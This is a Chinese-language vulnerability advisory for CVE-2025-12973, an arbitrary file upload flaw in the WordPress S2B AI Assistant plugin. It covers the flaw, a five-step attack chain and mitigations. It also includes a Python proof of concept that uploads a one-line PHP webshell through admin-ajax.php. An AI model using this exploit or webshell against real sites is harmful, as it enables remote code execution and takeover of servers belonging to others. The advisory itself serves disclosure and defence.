CVE-2025-12973 CVSS 7.2 高危

CVE-2025-12973: WordPress S2B AI Assistant插件任意文件上传漏洞

披露日期: 2025-11-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12973

漏洞类型

任意文件上传

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

S2B AI Assistant – ChatBot, ChatGPT, OpenAI, Content & Image Generator (WordPress插件)

漏洞概述

S2B AI Assistant是一款WordPress插件，集成了ChatGPT和OpenAI功能，提供聊天机器人和内容生成服务。该插件在1.7.8及之前版本中存在严重的任意文件上传漏洞。漏洞源于storeFile()函数缺少文件类型验证，攻击者可以利用此漏洞上传任意文件到服务器，包括恶意PHP脚本。一旦恶意文件被上传，攻击者可以执行任意代码，实现远程代码执行(RCE)，完全控制受影响的WordPress网站。此漏洞需要认证才能利用，但只需要Editor级别（编辑者）的权限即可，因此具有较高的实际威胁性。

技术细节

漏洞存在于插件的lib/helpers/Utils.php文件中的storeFile()函数。该函数在处理文件上传时，仅验证了文件是否成功上传，但未对上传文件的MIME类型和扩展名进行严格检查。攻击者可以通过构造恶意请求，绕过基本的文件上传检查，上传.php等可执行文件。由于WordPress插件通常具有较高的执行权限，上传的恶意脚本可以以Web服务器身份执行系统命令。攻击者可以利用此漏洞上传webshell，获得服务器的持久化访问权限。

攻击链分析

STEP 1

攻击者获取WordPress网站Editor级别或更高权限的账户

STEP 2

构造恶意文件上传请求，绕过文件类型检查

STEP 3

通过storeFile()函数上传包含恶意代码的PHP文件

STEP 4

访问上传的恶意文件并执行任意系统命令

STEP 5

获取服务器完全控制权限，可能导致数据泄露或进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
cookie = sys.argv[2] if len(sys.argv) > 2 else ''

files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')}
data = {'action': 's2b_store_file'}

response = requests.post(f'{target}/wp-admin/admin-ajax.php', files=files, data=data, cookies={'wordpress_test_cookie': cookie})
print(response.text)

影响范围

S2B AI Assistant < 1.7.9

防御指南

临时缓解措施

立即将S2B AI Assistant插件升级至1.7.9或更高版本；临时禁用或删除该插件直至完成更新；在Web服务器配置中限制上传目录的脚本执行权限；启用WAF规则阻止可疑的文件上传请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表